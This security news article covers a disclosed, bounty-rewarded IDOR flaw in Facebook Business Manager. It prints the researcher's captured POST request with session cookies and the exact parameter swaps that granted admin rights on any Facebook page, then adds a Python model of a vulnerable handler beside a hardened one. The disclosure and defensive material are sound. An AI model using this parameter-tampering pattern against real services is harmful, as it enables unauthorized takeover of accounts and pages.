The Indian security researcher Arun Sureshkumar reported a critical vulnerability in Facebook Business Manager that could be exploited by attackers to hack any Facebook page.
The Business Manager is the component that allows businesses to share and control access to assets on Facebook, including Pages and Ad accounts.
Facebook Business Manager also allows administrators to share access to Pages and ad accounts without being friends with coworkers on Facebook.
Before analyzing the technique devised by the researcher, let me introduce the concept of Insecure Direct Object Reference (IDOR).
According to the definition provided by the OWASP project, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, an attacker can bypass authorization and access resources in the system directly.
“Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.” states OWASP.
Sureshkumar exploited an IDOR vulnerability in the Facebook Business Manager that allowed him to take over any Facebook page in less than 10 seconds.
Sureshkumar used his Facebook business account (ID 907970555981524) to add a partner. As the partner, he used a test account with ID 991079870975788.
He used Burp Suite to capture the request; the tool allowed him to modify it before it was sent.
POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733
So how was he able to hack a Facebook page?
He replaced the ‘asset_id’ value with the ID of the target page, and also interchanged the ‘parent_business_id’ value with the ‘agency_id’ value. He also changed the role value to ‘MANAGER’.
parent_business_id=991079870975788
agency_id=907970555981524
asset_id=190313461381022
role=MANAGER
With this simple trick, Sureshkumar demonstrated that hacking Facebook Pages was possible. He obtained admin rights on the business page.
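The server-side check whose absence makes such a request work, as an added Python example that is not from the original article and is not Facebook's code: a share handler that trusts the submitted IDs beside one that binds the referenced business and asset to the authenticated session. All handler names, roles and IDs are constructed, and the model assumes the caller administers both of his own business accounts, as with the researcher's test partner.

```python
# Constructed model: all names and IDs are hypothetical, not Facebook's.
BUSINESS_ADMINS = {"biz_a": {"user_a"}, "biz_b": {"user_a"}, "biz_victim": {"user_v"}}
ASSET_OWNER = {"page_a": "biz_a", "page_victim": "biz_victim"}
ALLOWED_ROLES = {"MANAGER", "EDITOR"}  # constructed role set

class Forbidden(Exception):
    """Raised when the session is not entitled to the referenced objects."""

def share_asset_vulnerable(session_user, form, grants):
    # IDOR: object references from the request body are used as-is;
    # nothing ties them to the authenticated session.
    grants.add((form["agency_id"], form["asset_id"], form["role"]))
    return grants

def share_asset_hardened(session_user, form, grants):
    parent, agency = form["parent_business_id"], form["agency_id"]
    asset, role = form["asset_id"], form["role"]
    # 1. The caller must administer the business that grants access.
    if session_user not in BUSINESS_ADMINS.get(parent, set()):
        raise Forbidden("caller does not administer parent business")
    # 2. The asset must belong to that same business. Check 1 alone is not
    #    enough when the caller controls both parent and agency.
    if ASSET_OWNER.get(asset) != parent:
        raise Forbidden("asset is not owned by parent business")
    # 3. Role and recipient must be known values.
    if role not in ALLOWED_ROLES or agency not in BUSINESS_ADMINS:
        raise Forbidden("unknown role or agency")
    grants.add((agency, asset, role))
    return grants

# Constructed requests with the same four fields as the request above.
LEGIT = {"parent_business_id": "biz_a", "agency_id": "biz_b",
         "asset_id": "page_a", "role": "MANAGER"}
TAMPERED = {"parent_business_id": "biz_b", "agency_id": "biz_a",
            "asset_id": "page_victim", "role": "MANAGER"}

def is_allowed(handler, form, user="user_a"):
    """Return True if the handler accepts the request for this session user."""
    try:
        handler(user, form, set())
        return True
    except Forbidden:
        return False

if __name__ == "__main__":
    for name, form in (("legit", LEGIT), ("tampered", TAMPERED)):
        print(name, is_allowed(share_asset_vulnerable, form),
              is_allowed(share_asset_hardened, form))
```

In this model the tampered request passes the caller check, because the caller administers the business named as parent, and is rejected only by the asset ownership check.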
Sureshkumar also published a video PoC of the attack.
The security expert reported the flaw to Facebook on August 29, 2016. Facebook investigated the problem and also discovered another flaw in its platform.
The social network giant awarded Sureshkumar 16,000 USD as part of its bug bounty program.
(Security Affairs – Hacking Facebook, Social Network)